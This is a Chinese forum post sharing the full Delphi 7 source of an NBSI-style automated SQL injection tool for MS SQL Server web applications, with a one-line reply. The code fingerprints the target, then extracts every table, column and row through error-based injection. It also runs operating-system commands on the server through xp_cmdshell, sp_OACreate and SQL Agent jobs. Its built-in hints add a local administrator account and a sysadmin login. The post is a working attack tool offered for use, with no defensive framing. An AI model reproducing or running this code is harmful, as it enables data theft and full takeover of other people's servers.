发出来NBSI delphi版的代码
<SPAN class=tpc_content><FONT size=2><BR>D7原代码:<BR><BR>unit untmain;<BR><BR>interface<BR><BR>uses<BR>Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,<BR>Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection,<BR>IdTCPClient, OleCtrls, SHDocVw,mshtml;<BR><BR>type<BR>TForm1 = class(TForm)<BR> Label1: TLabel;<BR> EdtUrl: TEdit;<BR> BtnCheck: TButton;<BR> Label2: TLabel;<BR> GroupBox1: TGroupBox;<BR> Label7: TLabel;<BR> Label3: TLabel;<BR> Label4: TLabel;<BR> Label5: TLabel;<BR> Label6: TLabel;<BR> EdtMuliCase: TEdit;<BR> EdtQuery: TEdit;<BR> EdtUser: TEdit;<BR> EdtPower: TEdit;<BR> EdtDbName: TEdit;<BR> Memo1: TMemo;<BR> GroupBox2: TGroupBox;<BR> cbDisp: TCheckBox;<BR> EdtCommand: TEdit;<BR> rbCmd: TRadioButton;<BR> rbOA: TRadioButton;<BR> BtnExecute: TButton;<BR> GroupBox3: TGroupBox;<BR> Memo2: TMemo;<BR> wb: TWebBrowser;<BR> BtnStop: TButton;<BR> rbJob: TRadioButton;<BR> BtnCancel: TButton;<BR> procedure BtnCheckClick(Sender: TObject);<BR> procedure BtnExecuteClick(Sender: TObject);<BR> procedure wbDocumentComplete(Sender: TObject; const pDisp: IDispatch;<BR> var URL: OleVariant);<BR> procedure BtnStopClick(Sender: TObject);<BR> procedure rbCmdClick(Sender: TObject);<BR> procedure rbOAClick(Sender: TObject);<BR> procedure rbJobClick(Sender: TObject);<BR> procedure FormShow(Sender: TObject);<BR> procedure BtnCancelClick(Sender: TObject);<BR>private<BR> { Private declarations }<BR> tag:integer;<BR> isFinish,isCancel:boolean;<BR> function Get(URL: string): boolean;<BR> function GetWBMsg(URL: string): string;<BR> Function StrToNChar(DbName,TName:string): string;<BR> procedure SetRdbCheck(rd:TRadioButton);<BR>public<BR> { Public declarations }<BR>end;<BR><BR>var<BR>Form1: TForm1;<BR><BR>implementation<BR><BR>{$R *.dfm}<BR><BR>procedure TForm1.BtnCheckClick(Sender: TObject);<BR>const<BR>vFieldCount=5;<BR>PowerStr :array of string=(<BR> 'sysadmin','dbcreator','diskadmin',<BR> 'processadmin','serveradmin',<BR> 
'setupadmin','securityadmin');<BR>var<BR>Url,DbName,TName,TName0,ColName,ColName0,NCharStr:string;<BR>i,j,k,iCount:integer;<BR>VerStr,ValueStr,CountStr,Powers:string;<BR>FieldStr,FieldOrdStr,CFieldStr:string;<BR>vfield:OleVariant;<BR>begin<BR>try<BR> EdtMuliCase.Text :='';<BR> EdtQuery.Text :='';<BR> EdtUser.Text :='';<BR> EdtPower.Text :='';<BR> EdtDbName.Text :='';<BR> Url:=trim(EdtUrl.Text);<BR> isFinish :=False;<BR> vfield :=VarArrayCreate(,varVariant);<BR> Memo1.Clear;<BR> Screen.Cursor :=crHourGlass;<BR> //判断是否支持多句查询<BR> if Get(Url+';declare%20@a%20int--') then<BR> begin<BR> EdtMuliCase.Text :='支持';<BR> end else<BR> begin<BR> EdtMuliCase.Text :='不支持';<BR> end;<BR> //判断是否支持子查询<BR> if get(Url+'%20and%20(Select%20count(1)%20from%20)>=0') then<BR> begin<BR> EdtQuery.Text :='支持';<BR> end else<BR> begin<BR> EdtQuery.Text :='不支持';<BR> end;<BR> //取得当前用户<BR> EdtUser.Text :=GetWBMsg(Url+'%20and%20char(124)%2Buser%2Bchar(124)=0');<BR> //取得当前用户登录的服务器角色成员<BR> for i:=0 to High(PowerStr) do<BR> begin<BR> if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER('''+PowerStr+''')%20as%20varchar(1))=1') then<BR> begin<BR> Powers :=Powers+PowerStr+'|';<BR> end;<BR> end;<BR> if Powers='' then<BR> EdtPower.Text :='未知'<BR> else EdtPower.Text :=Powers;<BR> //指明当前用户是否为 db_owner 固定数据库角色的成员<BR>{ if get(Url+'%20And%20Cast(IS_MEMBER(''db_owner'')%20as%20varchar(1))=1') then<BR> begin<BR> EdtPower.Text :='db_owner';<BR> end else<BR> begin<BR> EdtPower.Text :='未知';<BR> end; }<BR> //得到当前SQL Server的版本号<BR> VerStr :=GetWBMsg(Url+'%20and%20char(124)%2B@@version%2Bchar(124)>0');<BR> Memo1.Lines.Add('当前版本号:'+VerStr);<BR> Memo1.Lines.Add('');<BR> //取得数据库名<BR> DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');<BR> EdtDbName.Text :=DbName;<BR> if (DbName='') or (DbName='未知') then<BR> begin<BR> Memo1.Lines.Add('未知的数据库,操作终止!');<BR> exit;<BR> end;<BR> Memo1.Lines.Add('当前数据库:'+DbName);<BR> BtnStop.Visible :=true;<BR> BtnCheck.Visible :=False;<BR> //猜解表名<BR> Memo1.Lines.Add('');<BR> 
Memo1.Lines.Add('开始猜解表名.....');<BR> Memo1.Lines.Add('#######################');<BR> for i:=1 to 1000 do<BR> begin<BR> TName :='';<BR> TName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)%20as%20varchar(8000))'+<BR> '%20from(Select%20Top%20'+inttostr(i)+'%20id,name%20from%20['+DbName+']..'+<BR> '%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0;--');<BR> if (TName0=TName) or (isFinish) then<BR> Break;<BR> Memo1.Lines.Add('表名 :'+TName);<BR> //猜解列名<BR> Memo1.Lines.Add('');<BR> Memo1.Lines.Add('开始猜解列名.....');<BR> Memo1.Lines.Add('#######################');<BR> NCharStr :='';<BR> NCharStr :=StrToNChar(DbName,TName);<BR> j:=1;<BR> while j<1000 do<BR> begin<BR> ColName :='';<BR> ColName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)'+<BR> '%20as%20varchar(8000))%20from%20(Select%20Top%20'+inttostr(j)+'%20colid,name'+<BR> '%20From%20['+DbName+']..%20Where%20id%20=%20'+NCharStr+<BR> '%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0;--');<BR> if (ColName0=ColName) or (isFinish) then<BR> j:=1000<BR> else begin<BR> Memo1.Lines.Add('列名 '+inttostr(j)+' :'+ColName);<BR> if j<vFieldCount+1 then<BR> begin<BR> vfield :=ColName;<BR> end;<BR> ColName0 :=ColName;<BR> inc(j);<BR> end;<BR> end;<BR> Memo1.Lines.Add('#######################');<BR> Memo1.Lines.Add('列名猜解结束.....');<BR> Memo1.Lines.Add('');<BR> //猜解数据<BR> Memo1.Lines.Add('开始猜解数据.....');<BR> Memo1.Lines.Add('#######################');<BR> CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+<BR> '%2Bchar(124)%20From%20['+TName+']%20Where%201=1)>0;--');<BR> try<BR> iCount :=strtoint(CountStr);<BR> except<BR> Memo1.Lines.add('出现意外数据,操作终止!');<BR> exit;<BR> end;<BR> Memo1.Lines.Add('表 '+TName+' :共有 '+CountStr+' 条数据。');<BR> CFieldStr :='';<BR> FieldStr :='';<BR> FieldOrdStr :=''; <BR> for k:=0 to vFieldCount-1 do<BR> begin<BR> if k=0 then<BR> begin<BR> CFieldStr 
:='isNull(cast(['+vfield+']%20as%20varchar(8000)),char(32))';<BR> FieldStr :='['+vfield+']';<BR> FieldOrdStr :='['+vfield+']%20desc';<BR> end else<BR> begin<BR> CFieldStr :=CFieldStr+'%2B%20%2BisNull(cast(['+vfield+']%20as%20varchar(8000)),char(32))';<BR> FieldStr :=FieldStr+',['+vfield+']';<BR> FieldOrdStr :=FieldOrdStr+',['+vfield+']%20desc';<BR> end;<BR> end;<BR> k:=1;<BR> while k<iCount+1 do<BR> begin<BR> ValueStr :='';<BR> ValueStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20char(124)%2B'+CFieldStr+'%2Bchar(124)%20From%20(Select'+<BR> '%20Top%20'+inttostr(k)+'%20'+FieldStr+'%20From%20['+DbName+']..['+TName+']%20Where%201=1'+<BR> '%20Order%20by%20'+FieldStr+')%20T%20Order%20by%20'+FieldOrdStr+')>0;--');<BR><BR> if isFinish then<BR> k:=iCount+1;<BR> Memo1.Lines.Add('数据 '+inttostr(k)+' :'+ValueStr);<BR> inc(k);<BR> end;<BR> Memo1.Lines.Add('#######################');<BR> Memo1.Lines.Add('数据猜解结束.....'); <BR> Memo1.Lines.Add('');<BR> TName0 :=TName;<BR> end;<BR> Memo1.Lines.Add('#######################');<BR> Memo1.Lines.Add('表名猜解结束.....');<BR>finally<BR> Screen.Cursor :=crDefault;<BR> BtnStop.Visible :=False;<BR> BtnCheck.Visible :=True;<BR>end;<BR>end;<BR><BR>procedure TForm1.BtnExecuteClick(Sender: TObject);<BR>var<BR>Url,DbName,CommandStr:string;<BR>ResultStr,CountStr:string;<BR>iCount,i:integer;<BR>begin<BR>try<BR> Url:=trim(EdtUrl.Text);<BR> ResultStr :='';<BR> CommandStr :='';<BR> isCancel :=False;<BR> CommandStr:=trim(EdtCommand.Text);<BR> CommandStr:=StringReplace(CommandStr,'%','%25',);<BR> CommandStr:=StringReplace(CommandStr,' ','%20',);<BR> Memo2.Clear;<BR> Screen.Cursor :=crHourGlass;<BR> //取得数据库名<BR> DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');<BR> if (DbName='') or (DbName='未知') then<BR> begin<BR> Memo2.Lines.Add('未知的数据库,操作终止!');<BR> exit;<BR> end;<BR> //Cmd_shell<BR> //使用xp_cmdshell来运行系统命令<BR> if rbCmd.Checked then<BR> begin<BR> //回显<BR> if cbDisp.Checked then<BR> begin<BR> BtnCancel.Visible :=true;<BR> BtnExecute.Visible 
:=False;<BR> //第一种办法<BR> //把命令执行的结果保存到一个本地文件中,然后将此文件的内容写入到新建的临时表进行输出<BR> {CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'>C:\Command_Tmp.log'''+<BR> ';DROP%20TABLE%20'+<BR> ';CREATE%20TABLE%20(%20varchar(7996)%20NULL)'+<BR> ';BULK%20INSERT%20['+DbName+']..%20FROM%20''C:\Command_Tmp.log''%20WITH%20(KEEPNULLS)'+<BR> ';Alter%20Table%20%20add%20%20int%20NOT%20NULL%20IDENTITY%20(1,1)--'; }<BR><BR> //第二种办法,直接把命令执行的结果写入数据库中输出,效率较高<BR> CommandStr :=Url+';DROP%20TABLE%20;'+<BR> 'CREATE%20TABLE%20(%20int%20NOT%20NULL%20IDENTITY%20(1,1),'+<BR> '%20%20varchar(1024)%20NULL);'+<BR> 'insert%20into%20(ResultTxt)%20EXEC%20MASTER..XP_CMDSHELL%20'''+<BR> CommandStr+''';insert%20into%20%20values%20(''g_over'')--';<BR><BR> if Get(CommandStr) then<BR> begin<BR> CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+<BR> '%2Bchar(124)%20From%20%20Where%201=1)>0;--');<BR> try<BR> iCount :=strtoint(CountStr);<BR> except<BR> Memo2.Lines.add('出现意外数据,操作终止!');<BR> exit;<BR> end;<BR> for i:=1 to iCount do<BR> begin<BR> ResultStr :='';<BR> ResultStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null'+<BR> '%20then%20char(32)%20else%20char(124)%2BResultTxt%2Bchar(124)'+<BR> '%20End%20From%20%20Where%20ID='+IntToStr(i)+')=0;--');<BR> if isCancel then<BR> Break;<BR> if (ResultStr<>'') and (ResultStr<>'未知') then<BR> Memo2.Lines.Add(ResultStr);<BR> end;<BR> end;<BR> if Get(Url+';DROP%20TABLE%20--') then<BR> begin<BR> Memo2.Lines.Add('命令执行完成');<BR> end;<BR> end else<BR> begin<BR> CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'''--';<BR> if get(CommandStr) then<BR> Memo2.Lines.Add('命令执行完成。');<BR> end;<BR> end;<BR> //OAcreate<BR> //使用sp_OACreate来运行系统命令<BR> if rbOA.Checked then<BR> begin<BR> //指明当前用户是否为 sysadmin 固定服务器角色的成员<BR> if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER(''sysadmin'')%20as%20varchar(1))=1') then<BR> begin<BR> CommandStr :=Url+';use%20'+DbName+';declare%20@o%20int;exec%20'+<BR> 
'sp_oacreate%20''wscript.shell'',@o%20out;exec%20'+<BR> 'sp_oamethod%20@o,''run'',NULL,''cmd%20/c%20'+<BR> CommandStr+'''--';<BR> if Get(CommandStr) then<BR> Memo2.Lines.Add('命令执行完成。');<BR> end else<BR> begin<BR> Memo2.Lines.Add('只有 sysadmin 固定服务器角色的成员才能执行 sp_OACreate。');<BR> exit;<BR> end;<BR> end;<BR> //Job<BR> //使用SQLSERVERAGENT的JOB来运行系统命令<BR> if rbJob.Checked then<BR> begin<BR> //启动SQLSERVERAGENT<BR> if Get(Url+';exec%20master..xp_servicecontrol%20''start'',''SQLSERVERAGENT'';--') then<BR> begin<BR> Memo2.Lines.Add('SQLSERVERAGENT 启动成功!');<BR> CommandStr :=Url+';use%20'+DbName+';exec%20sp_delete_job%20null,''x'''+<BR> ';exec%20sp_add_job%20''x'''+<BR> ';exec%20sp_add_jobstep%20Null,''x'',Null,''1'',''CMDEXEC'',''cmd%20/c%20'+<BR> CommandStr+''';exec%20sp_add_jobserver%20Null,''x'',@@servername'+<BR> ';exec%20sp_start_job%20''x''--';<BR> if get(CommandStr) then<BR> Memo2.Lines.Add('命令执行完成。');<BR> end else<BR> begin<BR> Memo2.Lines.Add('SQLSERVERAGENT 启动失败,操作终止!');<BR> exit;<BR> end;<BR> end;<BR>finally<BR> Screen.Cursor :=crDefault;<BR> BtnExecute.Visible :=true;<BR> BtnCancel.Visible :=false;<BR>end;<BR>end;<BR><BR>function TForm1.Get(URL: string): boolean;<BR>var<BR>IDHTTP: TIDHttp;<BR>ss: String;<BR>begin<BR>Result:= False;<BR>IDHTTP:= TIDHTTP.Create(nil);<BR>try<BR> try<BR> idhttp.HandleRedirects:= true; //必须支持重定向否则可能出错<BR> idhttp.ReadTimeout:= 30000; //超过这个时间则不再访问<BR> ss:= IDHTTP.Get(URL);<BR> if IDHTTP.ResponseCode=200 then<BR> Result :=true;<BR> except<BR> //on E: Exception do<BR> // Application.MessageBox(pchar('出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);<BR> end;<BR>finally<BR> IDHTTP.Free;<BR>end;<BR>end;<BR><BR>function TForm1.GetWBMsg(URL: string): string;<BR>function GetResultStr(str:string):string;<BR>var<BR> istart,iend:integer;<BR> ss:string;<BR>begin<BR> istart:=pos('|',str);<BR> if istart>0 then<BR> begin<BR> ss:=copy(str,istart+1,length(str)-istart);<BR> iend :=pos('|',ss);<BR> if iend>0 then<BR> begin<BR> 
ss:=copy(ss,1,iend-1);<BR> end;<BR> end;<BR> if ss='' then<BR> Result :='未知'<BR> else Result :=ss;<BR>end;<BR>var<BR>ss:string;<BR>begin<BR>tag:=0;<BR>wb.Navigate(URL);<BR>while (tag=0) do<BR> Application.ProcessMessages;<BR>ss :=(wb.Document as IHTMLDocument2).Body.innerText;<BR>Result :=GetResultStr(ss);<BR>end;<BR><BR>function TForm1.StrToNChar(DbName, TName: string): string;<BR>var<BR>i:integer;<BR>ss,str:string;<BR>begin<BR>ss:=DbName+'..'+TName;<BR>for i:=1 to length(ss) do<BR>begin<BR> if i=1 then<BR> str :='NCHAR('+inttostr(ord(ss))+')'<BR> else<BR> str :=str+'%2BNCHAR('+inttostr(ord(ss))+')';<BR>end;<BR>Result :='OBJECT_ID('+str+')';<BR>end;<BR><BR>procedure TForm1.wbDocumentComplete(Sender: TObject;<BR>const pDisp: IDispatch; var URL: OleVariant);<BR>begin<BR>//Memo2.Text :=(wb.Document as IHTMLDocument2).Body.innerText;<BR>tag:=1;<BR>end;<BR><BR>procedure TForm1.BtnStopClick(Sender: TObject);<BR>begin<BR>isFinish :=True;<BR>BtnCheck.Visible :=true;<BR>BtnStop.Visible :=False;<BR>end;<BR><BR>procedure TForm1.SetRdbCheck(rd: TRadioButton);<BR>begin<BR>Memo2.Clear; <BR>if rd=rbCmd then<BR>begin<BR> cbDisp.Enabled :=True;<BR> Memo2.Lines.Add('使用xp_cmdshell来运行系统命令');<BR> Memo2.Lines.Add('');<BR> Memo2.Lines.Add('net user test test /add');<BR> Memo2.Lines.Add('net localgroup administrators test /add');<BR> Memo2.Lines.Add('exec master..sp_addlogin test,test');<BR> Memo2.Lines.Add('exec master..sp_addsrvrolemember test,sysadmin');<BR>end;<BR>if rd=rbOA then<BR>begin<BR> cbDisp.Enabled :=False;<BR> Memo2.Lines.Add('使用sp_OACreate来运行系统命令');<BR>end;<BR>if rd=rbJob then<BR>begin<BR> cbDisp.Enabled :=False;<BR> Memo2.Lines.Add('使用SQLSERVERAGENT的JOB来运行系统命令');<BR> Memo2.Lines.Add('请先使用下列语句启动SQLSERVERAGENT:');<BR> Memo2.Lines.Add('');<BR> Memo2.Lines.Add('</FONT><A href="http://x.com/x.asp?a=1;exec" target=_blank><FONT size=2>http://x.com/x.asp?a=1;exec</FONT></A><FONT size=2> master..xp_servicecontrol ''start'',''SQLSERVERAGENT'';--');<BR>end;<BR>end;<BR><BR>procedure 
TForm1.rbCmdClick(Sender: TObject);<BR>begin<BR>SetRdbCheck(rbcmd);<BR>end;<BR><BR>procedure TForm1.rbOAClick(Sender: TObject);<BR>begin<BR>SetRdbCheck(rbOA);<BR>end;<BR><BR>procedure TForm1.rbJobClick(Sender: TObject);<BR>begin<BR>SetRdbCheck(rbJob);<BR>end;<BR><BR>procedure TForm1.FormShow(Sender: TObject);<BR>begin<BR>SetRdbCheck(rbcmd);<BR>end;<BR><BR>procedure TForm1.BtnCancelClick(Sender: TObject);<BR>begin<BR>isCancel :=True;<BR>BtnExecute.Visible :=true;<BR>BtnCancel.Visible :=false;<BR>end;<BR><BR>end.</FONT></SPAN><BR>re:发出来NBSI delphi版的代码
嘿嘿 !